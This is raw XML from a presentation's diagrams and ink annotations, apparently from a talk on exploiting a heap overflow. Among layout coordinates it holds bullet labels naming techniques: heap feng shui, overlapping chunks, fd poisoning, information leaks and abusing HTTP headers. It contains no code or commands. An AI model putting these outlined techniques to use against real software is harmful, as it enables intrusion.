      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4833225" y="11751"/>
          <a:ext cx="1921500" cy="1921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2913E4-0101-43A5-9C50-C90938DB4DFB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5242725" y="421251"/>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CFAF0E-F629-4D86-9C84-A21BF36CE7C3}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4218975" y="2531752"/>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Living off the land</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4218975" y="2531752"/>
        <a:ext cx="315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74668-A517-5249-A4B0-42C941FE4E2C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="341557"/>
          <a:ext cx="7886700" cy="8079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95732" rIns="61209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Use </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1900" kern="1200" dirty="0">
              <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t>Connection</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1900" kern="1200" dirty="0"/>
            <a:t> header for another round</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="341557"/>
        <a:ext cx="7886700" cy="807975"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F4D27442-3B5E-4041-A01F-811ED6A65763}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="394335" y="61117"/>
          <a:ext cx="552069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44550">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1900" kern="1200" dirty="0"/>
            <a:t>Towards the end of program </a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="421715" y="88497"/>
        <a:ext cx="5465930" cy="506120"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{B375430D-94AF-B34E-9E93-A979F7FC1FF8}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1532572"/>
          <a:ext cx="7886700" cy="8079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95732" rIns="61209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Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t>X-Request-Id</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1900" kern="1200" dirty="0"/>
            <a:t> header</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="1532572"/>
        <a:ext cx="7886700" cy="807975"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{CCC4A5B2-7D12-644A-8FDC-896B19751B9A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="394335" y="1252132"/>
          <a:ext cx="552069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44550">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1900" kern="1200" dirty="0"/>
            <a:t>Is data controlled in overflow? Yes!</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="421715" y="1279512"/>
        <a:ext cx="5465930" cy="506120"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{34EB131E-ADD7-5543-9F8A-D05C6F05E011}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2723587"/>
          <a:ext cx="78867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5272AD-1D9F-4641-9EDC-868BAD3F0E98}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="394335" y="2443147"/>
          <a:ext cx="552069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44550">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1900" kern="1200" dirty="0"/>
            <a:t>Fully controlled size on overflow? Yes!</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="421715" y="2470527"/>
        <a:ext cx="5465930"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997B0-3E33-5A49-9FBF-07B0FD038352}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="0"/>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CB7B2-16D8-7F49-9FB8-AE2A52737AB1}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="7886700"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Fd Poison</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="0"/>
        <a:ext cx="7886700" cy="815875"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{0A240A55-8989-C64D-A7B3-8871B2A2D612}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="815875"/>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F0876-EBC3-034F-A124-99E877C84DA0}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="815875"/>
          <a:ext cx="7886700"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Overlapping chunks</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="815875"/>
        <a:ext cx="7886700" cy="815875"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{0845AE79-0C4F-EC4C-98A8-7C4C74C03E65}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1631751"/>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F075F6-CF4D-B84F-995C-FC8443EB7A11}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1631751"/>
          <a:ext cx="7886700"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Corrupt other important objects</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="1631751"/>
        <a:ext cx="7886700" cy="815875"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{DB3C8761-2F71-E84C-9775-EEDD68C4059E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2447628"/>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949052-758F-1A42-AC10-81AEC590F6AD}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2447627"/>
          <a:ext cx="7886700"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Information leaks</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="2447627"/>
        <a:ext cx="7886700" cy="8158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1BEC3-D8ED-D446-B7AB-9443EC03CA99}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="417832"/>
          <a:ext cx="788670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6E5C01-D6AC-1443-B4E1-9EE5FFCD4E97}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="394335" y="63592"/>
          <a:ext cx="5520690" cy="7084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a:t>Creativity </a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="428920" y="98177"/>
        <a:ext cx="5451520" cy="639310"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{6EA79D6D-79EB-7E48-B5AA-BFAD847CC03B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1506472"/>
          <a:ext cx="788670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89B1EA-4B27-8247-90E3-36DF8A085054}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="394335" y="1152232"/>
          <a:ext cx="5520690" cy="7084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a:t>Heap feng shui</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="428920" y="1186817"/>
        <a:ext cx="5451520" cy="639310"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{FCB0B013-4EB6-B24C-B1DB-ADD795E467BC}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2595112"/>
          <a:ext cx="788670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308956-C922-814C-BE5C-D8A44A268CC1}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="394335" y="2240872"/>
          <a:ext cx="5520690" cy="7084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a:t>Deep understanding of code</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="428920" y="2275457"/>
        <a:ext cx="5451520" cy="639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7T05:46:01.687"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05" units="cm"/>
      <inkml:brushProperty name="height" value="0.05" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">495 47 24575,'-22'0'0,"-2"4"0,-28 1 0,9 0 0,-11 4 0,16-5 0,18 1 0,3-2 0,14-1 0,-3 1 0,3 1 0,-5 0 0,-12 11 0,8-7 0,-20 12 0,22-15 0,-6 5 0,11-6 0,0-1 0,1 3 0,1-3 0,1 3 0,-5 11 0,5-7 0,-10 12 0,11-12 0,-6 3 0,3 6 0,-1-7 0,-2 11 0,4-14 0,1 4 0,-2 6 0,3-9 0,-5 12 0,6-16 0,-3 4 0,1-5 0,-1-1 0,1 1 0,0-1 0,0 0 0,1 1 0,-1 5 0,0-2 0,2 8 0,-2 31 0,2-15 0,0 20 0,0 5 0,-4-25 0,3 46 0,-5-48 0,6 27 0,-3-36 0,3 5 0,0-9 0,2-7 0,-1 0 0,0 2 0,1-6 0,1 10 0,0-10 0,2 6 0,6 2 0,-5-4 0,30 26 0,-24-22 0,24 22 0,-9-17 0,-7-3 0,30 11 0,-32-19 0,15 8 0,3-8 0,-17-5 0,44 1 0,-39-1 0,26-3 0,-11 3 0,-14-5 0,17-2 0,-30 1 0,7-3 0,-10 6 0,-2-2 0,2-2 0,-4 1 0,1-4 0,2-3 0,-1 4 0,6-16 0,-5 12 0,2-13 0,0 3 0,-1 1 0,8-18 0,-5 16 0,0-9 0,-2 0 0,-4 9 0,1-9 0,1-7 0,-2 15 0,4-35 0,-6 35 0,0-22 0,-4-1 0,0 14 0,0-32 0,0 44 0,0-17 0,0 3 0,0 14 0,-4-37 0,0 38 0,-1-19 0,-2 6 0,3 11 0,-5-24 0,6 27 0,-6-12 0,2 15 0,1 3 0,-1-1 0,6 6 0,-1 0 0,-3-4 0,4 4 0,-10-10 0,8 8 0,-5-3 0,1-1 0,1 6 0,-3-6 0,4 7 0,-2-2 0,3 3 0,-1-3 0,-12-3 0,8 2 0,-11-1 0,-5 2 0,8 4 0,-10-3 0,16 5 0,5-1 0,1 4 0,1 1 0,-1 1 0,0 1 0,3-1 0,-2-1 0,1 2 0,-3-2 0,1 4 0,-7-2 0,6 0 0,-5-2 0,7-1 0,1-2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4"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05" units="cm"/>
      <inkml:brushProperty name="height" value="0.05" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">49 1 24575,'0'14'0,"0"-2"0,0 22 0,0-19 0,0 15 0,0-7 0,0-10 0,0 10 0,0 7 0,0-15 0,5 42 0,-4-40 0,5 21 0,-6-16 0,0-8 0,4 20 0,-3-23 0,3 11 0,-4-2 0,0-7 0,0 14 0,0-18 0,0 3 0,0-4 0,0-3 0,0 10 0,0-9 0,0 8 0,0 7 0,0-8 0,-5 29 0,2-27 0,-6 19 0,-3-2 0,3-9 0,-4 13 0,9-16 0,1-7 0,0 5 0,2-8 0,-2 2 0,3-4 0,0-3 0,-2 0 0,2 0 0,-3 0 0,3 1 0,0-1 0,0 0 0,3 0 0,-3 1 0,2-1 0,-2 0 0,3 0 0,-3 1 0,5-1 0,-4 0 0,3-2 0,-1-1 0,2-2 0,1 0 0,-1 0 0,0 0 0,-2 3 0,2-3 0,-2 2 0,2-2 0,0 0 0,-2 3 0,2-3 0,-5 3 0,2-3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5"/>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6"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05" units="cm"/>
      <inkml:brushProperty name="height" value="0.05" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">9 3233 24575,'-4'-19'0,"3"5"0,-3-5 0,4 1 0,0-2 0,0-6 0,0-28 0,0 12 0,7-53 0,-5 31 0,9-5 0,-10-14 0,7 48 0,0-67 0,-3 72 0,8-42 0,-7 40 0,6-15 0,1-19 0,-6 24 0,3-7 0,-3 6 0,-3 18 0,17-58 0,-14 48 0,12-29 0,1-19 0,-7 33 0,0-17 0,-1 0 0,0 10 0,1-19 0,0 2 0,-8 20 0,10-53 0,-10 53 0,7-10 0,-1 19 0,-2 15 0,4-34 0,-5 40 0,-1-14 0,2 10 0,-5 11 0,2-36 0,0 34 0,-6-25 0,9 5 0,-7 15 0,10-39 0,-10 38 0,8-19 0,-3-1 0,-2 15 0,1-9 0,0-4 0,-4 18 0,4-19 0,-6 24 0,3 4 0,-2-1 0,2 8 0,-9-44 0,1 38 0,-1-38 0,3 44 0,0-5 0,2 4 0,-2 3 0,0 0 0,-1 1 0,1 3 0,-3-4 0,2 0 0,-2 1 0,-6-9 0,4-2 0,-4-3 0,-3-13 0,7 16 0,-6-11 0,7 14 0,3 4 0,-1 3 0,4 2 0,-2 1 0,0-3 0,2 1 0,-2 2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7"/>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8"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05" units="cm"/>
      <inkml:brushProperty name="height" value="0.05" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">276 3778 24575,'-4'-18'0,"3"-2"0,-6-5 0,0-10 0,-6-81 0,-1 31 0,8-22 0,2-4 0,-3 4 0,7 24 0,0-3 0,0 9 0,0 3 0,0-51 0,-3 15 0,-2 0 0,-4-7 0,1 38 0,-1-1 0,1 13 0,0 5 0,-6-19 0,5 4 0,1 0 0,1-1 0,-5-13 0,4-12 0,2 71 0,-16-89 0,18 89 0,-11-33 0,9 22 0,4 27 0,-8-27 0,9 28 0,-2 0 0,-1-3 0,3 9 0,-3-6 0,4-9 0,-4 5 0,3-36 0,-2 25 0,0-9 0,2-4 0,-2 24 0,-2-34 0,3 36 0,-3-11 0,5 15 0,0 2 0,0-6 0,0 8 0,0-6 0,0 6 0,0 1 0,0-4 0,0 2 0,3-4 0,1 1 0,0 0 0,-1 0 0,-3 0 0,0 2 0,0 2 0,0 2 0,0 1 0,0-1 0,0 0 0,3-7 0,-2 5 0,3-9 0,-4 11 0,0-6 0,0 6 0,0-5 0,10-14 0,-7 9 0,10-11 0,-12 10 0,2 6 0,1-11 0,-3 14 0,3-9 0,-1 8 0,-3-8 0,3-12 0,-3 3 0,0 0 0,5-6 0,-3 22 0,3-22 0,-5 25 0,0-7 0,0 8 0,0 1 0,0-1 0,0 0 0,0 1 0,0-1 0,0 1 0,0-1 0,0 1 0,0-1 0,0 0 0,3 1 0,-2-1 0,2 1 0,0-4 0,0 3 0,1-3 0,2 4 0,-2-1 0,-1 0 0,0 1 0,0 2 0,-2-2 0,2 3 0,0-1 0,-3 1 0,3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9"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05" units="cm"/>
      <inkml:brushProperty name="height" value="0.05" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">49 1076 24575,'0'-8'0,"0"-2"0,0 2 0,0-22 0,0 14 0,4-33 0,-2 29 0,5-11 0,-7-19 0,3 31 0,-3-46 0,0 46 0,0-17 0,0-14 0,3 22 0,3-53 0,-2 53 0,2-23 0,-6 8 0,0 17 0,0-12 0,0 19 0,0 10 0,0-10 0,0 10 0,0-3 0,0-10 0,0 13 0,0-13 0,0 14 0,-2 0 0,1 0 0,-1 3 0,0-2 0,1 1 0,-1-2 0,-3-11 0,4 10 0,-6-17 0,7 19 0,-3-5 0,0 7 0,3 0 0,-5 0 0,4-1 0,-1 1 0,2 0 0,-2 0 0,-1 0 0,0-1 0,-2 1 0,5-2 0,-5 1 0,2-4 0,-2 4 0,2-2 0,-2 1 0,3 1 0,-1-4 0,-2 4 0,4 1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7T05:46:07.469"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05" units="cm"/>
      <inkml:brushProperty name="height" value="0.05" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">413 82 24575,'-13'0'0,"0"0"0,-4 0 0,-1 0 0,1 0 0,-7 4 0,9-4 0,-4 4 0,14-2 0,-7 4 0,5 4 0,-13 8 0,8-4 0,-29 18 0,19-13 0,-13 7 0,6-2 0,19-15 0,-9 8 0,14-14 0,3 3 0,-2-1 0,1 2 0,-7 12 0,5-7 0,-8 10 0,10-14 0,-5 4 0,6-5 0,-3 0 0,3 2 0,0-4 0,2 1 0,0 11 0,0-7 0,0 12 0,0-8 0,0 0 0,0 15 0,0-12 0,0 26 0,0-26 0,2 9 0,-2-7 0,2-9 0,0 8 0,1-11 0,-1 0 0,2 2 0,-1-2 0,-1 2 0,2 0 0,-1 3 0,2-2 0,-2 1 0,1-3 0,-1 3 0,1-1 0,4 6 0,-2-2 0,5 3 0,-2 0 0,1-3 0,26 19 0,-23-21 0,24 15 0,-12-16 0,-5-1 0,24 8 0,-27-9 0,9 1 0,-14-2 0,-4-3 0,14 8 0,-12-9 0,9 5 0,0-5 0,-3-1 0,20 4 0,-8-6 0,4 4 0,24-5 0,-24 0 0,67 0 0,-64 0 0,25 0 0,-37 0 0,-13-2 0,8-1 0,-11-1 0,0-1 0,10-14 0,-8 9 0,12-22 0,-11 22 0,0-7 0,-1 7 0,-5 4 0,6-10 0,-9 10 0,7-9 0,-8-10 0,5 4 0,-4-9 0,2-1 0,-3 11 0,0-37 0,0 39 0,0-25 0,-5 5 0,3 18 0,-11-36 0,11 43 0,-9-17 0,6 17 0,-3-1 0,-2-9 0,3 12 0,1-9 0,-4 1 0,2 9 0,-12-25 0,8 24 0,-6-19 0,-6 1 0,4 5 0,-19-24 0,18 24 0,-6-6 0,-3 3 0,15 15 0,-13-11 0,23 18 0,-1 0 0,1 1 0,1 2 0,-3-1 0,-4 1 0,1 2 0,-13 0 0,-25-10 0,9 8 0,-46-14 0,57 13 0,-22-3 0,30 1 0,7 4 0,-4-3 0,13 4 0,1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37"/>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38"/>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39"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05" units="cm"/>
      <inkml:brushProperty name="height" value="0.05" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 0 24575,'0'6'0,"0"1"0,0-1 0,0 1 0,0 5 0,0-5 0,0 7 0,0-8 0,0 1 0,0-2 0,0 1 0,0-1 0,3 0 0,-3 0 0,6 0 0,-5 1 0,5-3 0,-5 1 0,2-1 0,-3 2 0,3 0 0,0 3 0,1-2 0,2 4 0,-5-5 0,2 3 0,-1-3 0,-1 0 0,5 0 0,-5 1 0,2-1 0,0-2 0,-3 1 0,6-1 0,-2 5 0,3-2 0,2 3 0,-4-3 0,6 4 0,-6-4 0,4 1 0,-2-1 0,0-1 0,-1 0 0,1-2 0,0 1 0,-1-1 0,-2 3 0,5-1 0,-5 2 0,6-3 0,-4 3 0,1-4 0,0 4 0,-1-1 0,1 1 0,-1 1 0,1-2 0,3 1 0,-3-2 0,3-2 0,-7 2 0,3-5 0,1 5 0,0-4 0,6 3 0,-6-1 0,3 2 0,14 2 0,-13-1 0,22 5 0,-21-5 0,4 0 0,-7-1 0,-2-2 0,3 2 0,-3-2 0,0 1 0,-2-3 0,-1 4 0,3-5 0,2 5 0,2-2 0,-1 0 0,2 1 0,-4-3 0,1 3 0,-2-3 0,0 1 0,2-2 0,2 3 0,2-3 0,0 3 0,0-3 0,1 0 0,-1 0 0,0 0 0,15 0 0,-11 0 0,12-3 0,-11-3 0,-6 2 0,6-2 0,-14 4 0,5 1 0,-5-3 0,2 3 0,1-4 0,3 2 0,25-4 0,-16 1 0,16 1 0,-25 0 0,-4 4 0,1-3 0,0 1 0,8-3 0,-7 1 0,7 1 0,-8-1 0,0 5 0,-1-7 0,1 3 0,8-1 0,-4 1 0,8 1 0,-6-2 0,-2-1 0,-2 3 0,-5-1 0,2 1 0,-5-2 0,4 0 0,-4-1 0,2 1 0,0 2 0,-2-1 0,2 1 0,0 0 0,-3-2 0,6 0 0,-5-1 0,2-1 0,0 2 0,-2-1 0,5 1 0,-6 0 0,3 0 0,-3 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0-3 0,0 2 0,3-4 0,-2 2 0,2 0 0,-3 1 0,0 1 0,0 1 0,0 0 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,3 0 0,-2-1 0,1-1 0,-2 1 0,0-1 0,0 1 0,0 1 0,0 0 0,0 0 0,3 2 0,-2-2 0,2 2 0,-3-2 0,3 0 0,-2 0 0,2 0 0,-3-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0-1 0,0 1 0,0 2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0"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05" units="cm"/>
      <inkml:brushProperty name="height" value="0.05" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">28 725 24575,'-4'-2'0,"-2"1"0,5-4 0,-5 5 0,6-5 0,-6 5 0,5-5 0,-2 2 0,3-2 0,0 0 0,0-3 0,0 3 0,0-3 0,0 3 0,0 0 0,0-1 0,0 1 0,3 0 0,-2 0 0,2 0 0,0-1 0,-3 1 0,3 0 0,-3 0 0,3 0 0,-2-1 0,2 1 0,-3 0 0,3 2 0,-2-2 0,2 3 0,-3-4 0,2-1 0,2 1 0,0-1 0,2-1 0,-6 2 0,3-4 0,0 5 0,-2-3 0,2 1 0,0 1 0,-2-2 0,2 3 0,-3 0 0,0 0 0,0 0 0,0-1 0,3 1 0,-3-2 0,3 1 0,-3-2 0,3 5 0,-2-1 0,2 1 0,-3-2 0,3-3 0,-2 2 0,4-3 0,-4 3 0,2-2 0,0 3 0,-2-2 0,5 1 0,-6-2 0,3 3 0,0-2 0,-2-2 0,5 1 0,-5-1 0,2 3 0,0 1 0,-3-2 0,3 3 0,0-3 0,-2 1 0,2 1 0,0-2 0,1 1 0,-1-4 0,3 4 0,-2-1 0,2-1 0,-2 3 0,5-5 0,-8 2 0,8-1 0,-5 0 0,0 3 0,2-2 0,-3 3 0,4 0 0,-1 0 0,-2 0 0,2-1 0,-2 1 0,2 2 0,1-4 0,0 4 0,-1-5 0,1 3 0,-1 2 0,1-1 0,0 3 0,2-6 0,-1 4 0,1-5 0,-2 5 0,-3-1 0,1 3 0,-1-4 0,0 3 0,2-1 0,-3-2 0,7 2 0,0-2 0,1 0 0,-2 2 0,-2-2 0,-1 2 0,1-2 0,3 0 0,0 0 0,9-1 0,-8 1 0,7 1 0,-13-1 0,3 5 0,-4-5 0,3 5 0,-1-3 0,1 1 0,0 1 0,-1-3 0,1 3 0,2-1 0,-1 0 0,1 1 0,1-4 0,-3 5 0,3-3 0,-6 3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1"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05" units="cm"/>
      <inkml:brushProperty name="height" value="0.05" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 0 24575,'6'0'0,"1"0"0,0 0 0,-1 0 0,-2 3 0,2-3 0,6 3 0,-1-1 0,13-1 0,-9 1 0,4 0 0,-9-1 0,0 1 0,-4 0 0,1-1 0,-1 1 0,-2 1 0,2-3 0,-2 3 0,2-1 0,1-2 0,0 3 0,-4-1 0,3-1 0,-2 3 0,2-3 0,1 3 0,0-3 0,2 4 0,-1-2 0,1-1 0,-5 3 0,2-4 0,-3 3 0,4-1 0,0 2 0,-1-2 0,-2 2 0,2-2 0,-2 2 0,-1 0 0,3-2 0,-2 2 0,0-2 0,1-1 0,-4 3 0,5-4 0,-5 3 0,5-1 0,-6 2 0,6-2 0,-5 2 0,5-2 0,-2 2 0,-1 0 0,3 0 0,1 1 0,-3-1 0,5-2 0,-1 8 0,-3-7 0,9 10 0,-10-6 0,6 1 0,-7-2 0,3-4 0,-5 2 0,5-3 0,-3 4 0,1-1 0,2 0 0,-2 0 0,-1 0 0,3 1 0,-1 5 0,-1-4 0,2 5 0,-1 0 0,2-8 0,-3 10 0,2-11 0,-2 5 0,-1-3 0,0 0 0,-3 0 0,0 0 0,0 7 0,0-3 0,0 4 0,0-3 0,0 2 0,0-3 0,0 3 0,0-7 0,3-2 0,-2 1 0,2-1 0,-3 3 0,0-1 0,0 0 0,3 0 0,-2 0 0,2 1 0,-3-1 0,0 0 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,3-2 0,-3 2 0,3-2 0,-3 2 0,0 0 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 0 0,0 1 0,0-1 0,-3-2 0,3 1 0,-3-1 0,3 2 0,0 1 0,3-4 0,-3 3 0,3-2 0,-3 2 0,3 0 0,-2 1 0,5-1 0,-5 0 0,4 0 0,-4 0 0,5 1 0,-5-1 0,2-2 0,-3-1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2"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05" units="cm"/>
      <inkml:brushProperty name="height" value="0.05" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
